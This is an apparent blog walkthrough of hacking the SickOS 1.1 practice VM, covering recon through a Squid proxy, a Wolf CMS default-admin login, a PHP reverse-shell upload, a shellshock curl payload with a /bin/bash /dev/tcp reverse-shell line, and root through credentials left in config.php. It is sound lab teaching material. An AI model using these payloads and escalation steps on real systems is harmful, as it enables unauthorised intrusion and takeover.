Saturday, June 9, 2018

SickOS 1.1


- Layout for this exercise:


- The goal of this exercise is the study of the hacking process for the vulnerable machine SickOS 1.1

- SickOS 1.1 can be downloaded from here:,132/

- Once downloaded and extracted with WMware:


- Using netdiscover let's notice that the only IP address in the local network working with WMware is, so it should correspond to the vulnerable machine SickOS 1.1:

- Scanning with Nmap there are 2 ports open: 22 (ssh) and 3128 (Squid http-proxy):

- Configuring the Firefox Connection Settings for the discovered HTTP proxy (

- Connecting with the browser:

- Viewing the source there is nothing interesting:

- Let's explore the website structure with dirb:

- Looking at the robots.txt file:

- Exploring the folder /wolfcms:

- Using dirb against wolfcms:

- Looking inside the public folder:

- Using nikto to discover potential vulnerabilities:

- The most remarkable result is that /cgi-bin/status is vulnerable to shellshock vulnerability:


- Let's try two ways to exploit the vulnerable machine.

3.1 - Uploading a webshell

- Googling for Wolf CMS vulnerabilities:

- Going back to /wolfcms we learn that there is an Administrator:

- Reading from the previous description of the vulnerability:

- Let's explore the admin option:

- Trying admin:admin the authentication works:

- Going to the Files tab there is an Upload File function:

- Up to this point, why not to upload a webshell?

- Kali Linux has got some webshells available:

- For instance, let's explore php-reverse-shell.php

- Opening the file we see that there are two parameters that must be changed or adapted to our neeeds (IP and port to connect):

- Copying the webshell to a working folder so that we can manipulate it without losing the original version:

- Opening the webshell and modifying IP and port:

- Now it is ready to be uploaded to the vulnerable machine:

- We find php-reverse-shell.php at the /public folder:

- Before running it, let's establish a netcat listening session on port 3333:

- Running the webshell:

- The attack is successful, and a limited shell is achieved at the attacker's side:

3.2 - Shellshock

- Now, let's try to exploit the site taking advantage of the shellshock vulnerability

- We can check that the cgi script uses bash as interpreter because the path gives us uptime/uname result inside a Json string:

- Setting up a netcat listening session on port 4444:

- Let's craft a command curl to achieve a reverse shell:

- The parameters used in this case:
  • - x (proxy) =
  • -H (header) = User-Agent ignored; /bin/bash -i>& /dev/tcp/ 0>&1 
  • target =

- A limited shell is achieved at the attacker's side:


- Listing the folder /var/www:

- Listing wolfcms:

- Opening config.php we find interesting credentials for the user root:

- Trying to use the root credentials to achieve a shell, we find that the current shell does not allow to use the sudo command:

- Importing a tty terminal so that we can run a /bin/bash shell:

- Trying again, su works but the authentication fails:

- Remembering the current user:

- Let's move to another user, for instance sickos:

- Now the authentication is correct:

- Finally a root shell is achieved:

- Also, we could reach to same point by SSH-ing with the sickos user account:

- Surprisingly, sickos is a complete sudoer:

- Also:


- Reading the flag:

- By the way, the flag's name is an MD5 encryption string:

- Decrypting it results to be bleh!!